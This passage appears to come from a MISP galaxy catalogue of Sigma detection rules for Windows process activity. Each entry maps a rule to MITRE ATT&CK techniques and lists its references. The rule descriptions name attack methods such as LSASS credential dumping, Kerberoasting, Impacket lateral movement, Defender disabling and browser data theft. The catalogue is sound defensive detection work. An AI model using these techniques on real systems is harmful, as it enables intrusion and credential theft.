  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10342. Table References

Links

https://twitter.com/SBousseaden/status/1464566846594691073?s=20

https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/

https://twitter.com/Hexacorn/status/1420053502554951689

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_process_clone.yml

Suspicious Provlaunch.EXE Child Process

Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.

The tag is: misp-galaxy:sigma-rules="Suspicious Provlaunch.EXE Child Process"

Suspicious Provlaunch.EXE Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10343. Table References

Links

https://twitter.com/0gtweet/status/1674399582162153472

https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml

HackTool - Potential Impacket Lateral Movement Activity

Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework

The tag is: misp-galaxy:sigma-rules="HackTool - Potential Impacket Lateral Movement Activity"

HackTool - Potential Impacket Lateral Movement Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

Table 10344. Table References

Links

https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py

https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html

https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py

https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py

https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml

Winrar Compressing Dump Files

Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.

The tag is: misp-galaxy:sigma-rules="Winrar Compressing Dump Files"

Winrar Compressing Dump Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 10345. Table References

Links

https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml

Registry Modification Via Regini.EXE

Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.

The tag is: misp-galaxy:sigma-rules="Registry Modification Via Regini.EXE"

Registry Modification Via Regini.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10346. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Regini/

https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_execution.yml

Suspicious CMD Shell Output Redirect

Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location

The tag is: misp-galaxy:sigma-rules="Suspicious CMD Shell Output Redirect"

Suspicious CMD Shell Output Redirect has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10347. Table References

Links

https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml

File Download Via Bitsadmin To An Uncommon Target Folder

Detects usage of bitsadmin downloading a file to uncommon target folder

The tag is: misp-galaxy:sigma-rules="File Download Via Bitsadmin To An Uncommon Target Folder"

File Download Via Bitsadmin To An Uncommon Target Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10349. Table References

Links

https://isc.sans.edu/diary/22264

https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/

https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml

Suspicious Network Command

Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems

The tag is: misp-galaxy:sigma-rules="Suspicious Network Command"

Suspicious Network Command has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 10350. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_command.yml

PUA - Potential PE Metadata Tamper Using Rcedit

Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.

The tag is: misp-galaxy:sigma-rules="PUA - Potential PE Metadata Tamper Using Rcedit"

PUA - Potential PE Metadata Tamper Using Rcedit has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10351. Table References

Links

https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915

https://github.com/electron/rcedit

https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_rcedit_execution.yml

Powershell Defender Disable Scan Feature

Detects requests to disable Microsoft Defender features using PowerShell commands

The tag is: misp-galaxy:sigma-rules="Powershell Defender Disable Scan Feature"

Powershell Defender Disable Scan Feature has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10352. Table References

Links

https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files

https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps

https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml

Binary Proxy Execution Via Dotnet-Trace.EXE

Detects commandline arguments for executing a child process via dotnet-trace.exe

The tag is: misp-galaxy:sigma-rules="Binary Proxy Execution Via Dotnet-Trace.EXE"

Binary Proxy Execution Via Dotnet-Trace.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10353. Table References

Links

https://twitter.com/bohops/status/1740022869198037480

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml

Use of Scriptrunner.exe

The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting

The tag is: misp-galaxy:sigma-rules="Use of Scriptrunner.exe"

Use of Scriptrunner.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10354. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml

Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)

Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots…​etc.

The tag is: misp-galaxy:sigma-rules="Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)"

Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 10355. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_susp_usage.yml

Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE

Detects usage of cmdkey to look for cached credentials on the system

The tag is: misp-galaxy:sigma-rules="Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE"

Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

Table 10356. Table References

Links

https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation

https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1003.005/T1003.005.md#atomic-test-1---cached-credential-dump-via-cmdkey

https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml

Suspicious WMIC Execution Via Office Process

Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).

The tag is: misp-galaxy:sigma-rules="Suspicious WMIC Execution Via Office Process"

Suspicious WMIC Execution Via Office Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10357. Table References

Links

https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/

https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi(aka_REvil)_Ransomware.yaml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml

File Download Via Bitsadmin To A Suspicious Target Folder

Detects usage of bitsadmin downloading a file to a suspicious target folder

The tag is: misp-galaxy:sigma-rules="File Download Via Bitsadmin To A Suspicious Target Folder"

File Download Via Bitsadmin To A Suspicious Target Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10358. Table References

Links

https://isc.sans.edu/diary/22264

https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/

https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml

MsiExec Web Install

Detects suspicious msiexec process starts with web addresses as parameter

The tag is: misp-galaxy:sigma-rules="MsiExec Web Install"

MsiExec Web Install has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10359. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml

Suspicious PowerShell Invocation From Script Engines

Detects suspicious powershell invocations from interpreters or unusual programs

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Invocation From Script Engines"

Suspicious PowerShell Invocation From Script Engines has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10360. Table References

Links

https://www.securitynewspaper.com/2017/03/20/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_script_engine_parent.yml

Suspicious Invoke-WebRequest Execution With DirectIP

Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access

The tag is: misp-galaxy:sigma-rules="Suspicious Invoke-WebRequest Execution With DirectIP"

Suspicious Invoke-WebRequest Execution With DirectIP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10361. Table References

Links

https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml

Potential Persistence Via Netsh Helper DLL

Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Netsh Helper DLL"

Potential Persistence Via Netsh Helper DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1546.007" with estimative-language:likelihood-probability="almost-certain"

Table 10362. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md

https://github.com/outflanknl/NetshHelperBeacon

https://web.archive.org/web/20160928212230/https://www.adaptforward.com/2016/09/using-netshell-to-execute-evil-dlls-and-persist-on-a-host/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml

File With Suspicious Extension Downloaded Via Bitsadmin

Detects usage of bitsadmin downloading a file with a suspicious extension

The tag is: misp-galaxy:sigma-rules="File With Suspicious Extension Downloaded Via Bitsadmin"

File With Suspicious Extension Downloaded Via Bitsadmin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10364. Table References

Links

https://isc.sans.edu/diary/22264

https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/

https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml

Potential Adplus.EXE Abuse

Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.

The tag is: misp-galaxy:sigma-rules="Potential Adplus.EXE Abuse"

Potential Adplus.EXE Abuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10365. Table References

Links

https://twitter.com/nas_bench/status/1534915321856917506

https://twitter.com/nas_bench/status/1534916659676422152

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_adplus_memory_dump.yml

Conhost Spawned By Uncommon Parent Process

Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.

The tag is: misp-galaxy:sigma-rules="Conhost Spawned By Uncommon Parent Process"

Conhost Spawned By Uncommon Parent Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10366. Table References

Links

https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_uncommon_parent.yml

Potential SPN Enumeration Via Setspn.EXE

Detects service principal name (SPN) enumeration used for Kerberoasting

The tag is: misp-galaxy:sigma-rules="Potential SPN Enumeration Via Setspn.EXE"

Potential SPN Enumeration Via Setspn.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

Table 10367. Table References

Links

https://web.archive.org/web/20200329173843/https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation

https://www.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation/?edition=2019

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_setspn_spn_enumeration.yml

Execution Of Non-Existing File

Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)

The tag is: misp-galaxy:sigma-rules="Execution Of Non-Existing File"

Table 10368. Table References

Links

https://pentestlaboratories.com/2021/12/08/process-ghosting/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml

Suspicious Processes Spawned by WinRM

Detects suspicious processes including shells spawnd from WinRM host process

The tag is: misp-galaxy:sigma-rules="Suspicious Processes Spawned by WinRM"

Suspicious Processes Spawned by WinRM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 10369. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrm_susp_child_process.yml

New User Created Via Net.EXE With Never Expire Option

Detects creation of local users via the net.exe command with the option "never expire"

The tag is: misp-galaxy:sigma-rules="New User Created Via Net.EXE With Never Expire Option"

New User Created Via Net.EXE With Never Expire Option has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

Table 10370. Table References

Links

https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml

Forfiles.EXE Child Process Masquerading

Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.

The tag is: misp-galaxy:sigma-rules="Forfiles.EXE Child Process Masquerading"

Forfiles.EXE Child Process Masquerading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10371. Table References

Links

https://www.hexacorn.com/blog/2023/12/31/1-little-known-secret-of-forfiles-exe/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml

Suspicious Cabinet File Execution Via Msdt.EXE

Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190

The tag is: misp-galaxy:sigma-rules="Suspicious Cabinet File Execution Via Msdt.EXE"

Suspicious Cabinet File Execution Via Msdt.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10372. Table References

Links

https://twitter.com/nas_bench/status/1537896324837781506

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0

https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd

https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml

HackTool - Hydra Password Bruteforce Execution

Detects command line parameters used by Hydra password guessing hack tool

The tag is: misp-galaxy:sigma-rules="HackTool - Hydra Password Bruteforce Execution"

HackTool - Hydra Password Bruteforce Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"

Table 10374. Table References

Links

https://github.com/vanhauser-thc/thc-hydra

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_hydra.yml

Potential Configuration And Service Reconnaissance Via Reg.EXE

Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.

The tag is: misp-galaxy:sigma-rules="Potential Configuration And Service Reconnaissance Via Reg.EXE"

Potential Configuration And Service Reconnaissance Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 10375. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_query_registry.yml

Remote XSL Execution Via Msxsl.EXE

Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.

The tag is: misp-galaxy:sigma-rules="Remote XSL Execution Via Msxsl.EXE"

Remote XSL Execution Via Msxsl.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220" with estimative-language:likelihood-probability="almost-certain"

Table 10376. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msxsl_remote_execution.yml

Suspicious Program Names

Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools

The tag is: misp-galaxy:sigma-rules="Suspicious Program Names"

Suspicious Program Names has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10377. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_progname.yml

HackTool - Dumpert Process Dumper Execution

Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory

The tag is: misp-galaxy:sigma-rules="HackTool - Dumpert Process Dumper Execution"

HackTool - Dumpert Process Dumper Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10378. Table References

Links

https://github.com/outflanknl/Dumpert

https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_dumpert.yml

HTML Help HH.EXE Suspicious Child Process

Detects a suspicious child process of a Microsoft HTML Help (HH.exe)

The tag is: misp-galaxy:sigma-rules="HTML Help HH.EXE Suspicious Child Process"

HTML Help HH.EXE Suspicious Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 10379. Table References

Links

https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml

Security Privileges Enumeration Via Whoami.EXE

Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.

The tag is: misp-galaxy:sigma-rules="Security Privileges Enumeration Via Whoami.EXE"

Security Privileges Enumeration Via Whoami.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10380. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_priv_discovery.yml

Enable LM Hash Storage - ProcCreation

Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.

The tag is: misp-galaxy:sigma-rules="Enable LM Hash Storage - ProcCreation"

Enable LM Hash Storage - ProcCreation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10381. Table References

Links

https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password

https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_nolmhash.yml

Suspicious Reg Add Open Command

Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key

The tag is: misp-galaxy:sigma-rules="Suspicious Reg Add Open Command"

Suspicious Reg Add Open Command has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10382. Table References

Links

https://thedfirreport.com/2021/12/13/diavol-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_open_command.yml

Time Travel Debugging Utility Usage

Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.

The tag is: misp-galaxy:sigma-rules="Time Travel Debugging Utility Usage"

Time Travel Debugging Utility Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10383. Table References

Links

https://twitter.com/oulusoyum/status/1191329746069655553

https://lolbas-project.github.io/lolbas/Binaries/Tttracer/

https://twitter.com/mattifestation/status/1196390321783025666

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml

Esentutl Steals Browser Information

One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe

The tag is: misp-galaxy:sigma-rules="Esentutl Steals Browser Information"

Esentutl Steals Browser Information has relationships with:

